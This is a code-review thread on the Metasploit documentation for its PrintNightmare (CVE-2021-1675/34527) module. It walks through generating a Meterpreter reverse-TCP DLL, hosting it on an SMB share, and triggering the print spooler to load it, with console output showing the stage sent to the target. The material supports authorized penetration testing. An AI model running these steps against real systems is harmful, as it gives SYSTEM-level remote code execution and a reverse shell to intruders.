Add Module For CVE-2021-1675 / CVE-2021-34527 AKA PrintNightmare (#15385)
rapid7/metasploit-framework: documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md

## Vulnerable Application

> The print spooler service can be abused to load a remote DLL through a crafted DCERPC request.

Reviewer: Would be good to talk about the privileges gained here and whether this can be exploited locally or remotely.

```suggestion
The print spooler service can be abused by an unauthenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as the `SYSTEM` user.
```

## Verification Steps

1. Optionally, create a DLL payload that the target will execute
    1. From msfconsole
    1. Do: `use payload/windows/x64/meterpreter/reverse_tcp`
    1. Set the `LHOST` and `LPORT` values
    1. Do: `to_handler` to start the payload handler
    1. Do: `generate -f dll -o /path/to/save/the/payload.dll` to generate the DLL file

> 1. Start an SMB server with anonymous read access containing the DLL payload

Reviewer: An example of how to do this using a tool like Impacket's `smbserver.py` might be a good idea to give an example for people who might be curious how to do this.

Reviewer: Will update the documentation with some examples when I land this.

Reviewer: Additional documention added with https://github.com/rapid7/metasploit-framework/commit/70fd9376e3ad83a52e12fe0237fb8f6459db9cdd which fixes this.

    1. Run the module

## Options

### DLL_PATH

The path to the DLL that the server should load. This path can either be a network-based UNC path or a local path on the
remote target.

## Scenarios

### Windows Server 2019

First, generate the payload DLL or use an existing one. Copy it to the SMB server and note the UNC path. Any DLL can be
used but the architecture must match the host. This example generates a 64-bit Meterpreter payload using the Reverse TCP
stager.

```
msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 

msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f dll -o /tmp/reverse_tcp.x64.dll
[*] Writing 8704 bytes to /tmp/reverse_tcp.x64.dll...
msf6 payload(windows/x64/meterpreter/reverse_tcp) >
```

Next, use the module to trigger loading the DLL. Note that when setting the `DLL_PATH` option, the `\` characters are

> doubled to be escaped on the command line.

Reviewer: ```suggestion
doubled so that they are escaped on the command line.
```

SMBPASS => Password1
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.159.96

[*] 192.168.159.96:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.159.96:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Enumerating the installed printer drivers...
[*] 192.168.159.96:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\UNIDRV.DLL
[*] 192.168.159.96:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.159.96:445 - RpcAddPrinterDriverEx response 0 ERROR_SUCCESS (The operation completed successfully.)
[*] Sending stage (200262 bytes) to 192.168.159.96
[*] 192.168.159.96:445 - Error STATUS_PIPE_BROKEN (The pipe operation has failed because the other end of the pipe has been closed.)
[-] 192.168.159.96:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)

> [-] 192.168.159.96:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)

Reviewer: Think this was discussed before but personally I do think these should be behind a verbose flag as it gives the false impression that something went wrong on the remote end and the exploit is going to fail. If you had a message before this explaining that some errors were going to occur in normal situations I might be inclined to keep this in here but right now my eyes are draw to this and my first thought is "oh shooooot thats not good", which is never a good feeling to give a pentester :D
